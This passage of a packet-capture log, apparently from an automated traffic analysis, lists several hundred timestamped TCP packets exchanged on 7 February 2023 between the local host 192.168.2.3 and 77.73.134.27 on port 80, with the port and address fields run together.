                                                                                    Feb 7, 2023 19:44:50.500865936 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.500869989 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.500886917 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.500900030 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.500910044 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.500931978 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.500946045 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.500952959 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.500973940 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.500993013 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.501010895 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.501017094 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.501028061 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.501038074 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.501060009 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.501068115 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.501082897 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.501104116 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.501113892 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.501157045 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.501189947 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.501210928 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.501266956 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.501286030 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.501288891 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.501310110 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.501331091 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.501351118 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.501353025 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.501373053 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.501388073 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.501393080 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.501415968 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.501435041 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.501436949 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.501455069 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.501477003 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.501485109 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.501497030 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.501518011 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.501519918 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.501538038 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.501559019 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.501564980 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.501580000 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.501596928 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.501600981 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.501624107 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.501643896 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.501643896 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.501666069 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.501693010 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.501737118 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.510565042 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.510596991 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.510617971 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.510670900 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.515683889 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.515724897 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.515810966 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.516916990 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.516951084 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.517004967 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.519093990 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.519124031 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.519143105 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.519165039 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.519191980 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.519253969 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.523339033 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.523372889 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.523391962 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.523411036 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.523430109 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.523439884 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.523448944 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.523479939 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.523511887 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.523823977 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.523849964 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.523869991 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.523884058 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.523890018 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.523906946 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.523933887 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.523950100 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.523960114 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.523971081 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.524007082 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.524018049 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.524029016 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.524049044 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.524068117 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.524084091 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.524086952 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.524118900 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.524125099 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.524163008 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.524183989 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.524197102 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.524216890 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.524236917 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.524247885 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.524286985 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.524308920 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.524318933 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.524338961 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.524358034 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.524369001 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.524377108 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.524395943 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.524408102 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.524415016 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.524434090 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.524476051 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.524507046 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.524524927 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.524554014 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.524554014 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.524569988 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.524590015 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.524599075 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.524610996 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.524633884 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.533164024 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.533198118 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.533216953 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.533230066 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.533243895 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.533340931 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.533411026 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.538233042 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.538269043 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.538288116 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.538307905 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.538429976 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.541529894 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.541563988 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.541583061 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.541605949 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.541671991 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.541671991 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.547331095 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.547378063 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.547396898 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.547420979 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.547439098 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.547461033 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.547486067 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.547513962 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.547533035 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.547552109 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.547552109 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.547574043 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.547597885 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.547615051 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.547637939 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.547657013 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.547677994 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.547699928 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.547719955 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.547739029 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.547759056 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.547785044 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.547806978 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.547831059 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.547836065 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.547858000 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.547868013 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.547888041 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.547899961 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.547914982 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.547918081 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.547938108 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.547960997 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.547981977 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.548002958 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.548024893 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.548043013 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.548062086 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.548082113 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.548099041 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.548120975 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.548140049 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.548166990 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.548185110 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.548194885 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.548211098 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.548222065 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.548223019 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.548252106 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.548266888 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.548281908 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.548307896 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.548325062 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.548332930 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.548358917 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.548377037 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.548383951 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.548413038 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.548428059 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.548438072 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.548463106 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.548480034 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.548485994 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.548511982 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.548536062 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.548536062 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.548562050 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.548577070 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.548588991 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.548614979 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.548631907 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.548640013 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.548666000 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.548681974 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.548693895 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.548718929 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.548743010 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.548749924 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.548768997 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.548789024 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.548794985 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.548820019 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.548837900 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.550852060 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.555824995 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.555876017 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.555901051 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.555916071 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.555937052 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.555955887 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.556001902 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.556062937 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.560844898 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.560902119 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.560931921 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.560959101 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.560987949 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.560993910 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.561077118 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.563982964 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.564059019 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.564171076 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.571171045 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.571208954 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.571223974 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.571242094 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.571254969 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.571275949 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.571302891 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.571312904 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.571394920 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.571455956 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.571475983 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.571496010 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.571513891 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.571522951 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.571543932 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.571553946 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.571571112 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.571582079 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.571594000 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.571614981 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.571629047 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.571639061 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.571659088 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.571676016 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.571682930 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.571706057 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.571719885 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.571729898 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.571751118 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.571765900 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.571773052 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.571796894 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.571808100 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.571820974 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.571840048 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.571855068 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.571862936 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.571901083 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.571909904 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.571932077 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.571952105 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.571968079 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.571975946 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.572014093 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.572104931 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.572202921 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.572222948 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.572247028 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.572252989 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.572268009 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.572289944 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.572298050 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.572313070 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.572334051 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.572338104 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.572360039 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.572377920 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.572401047 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.572421074 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.572441101 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.572447062 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.572468042 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.572480917 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.572491884 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.572511911 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.572527885 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.572552919 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.572592974 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.572599888 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.572617054 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.572642088 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.572666883 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.572695017 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.572700977 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.572721958 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.572731018 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.572748899 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.572761059 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.572773933 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.572793961 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.572810888 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.572818041 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.572839022 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.572851896 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.572882891 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.572902918 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.572921991 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.572927952 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.572949886 CET804969877.73.134.27192.168.2.3
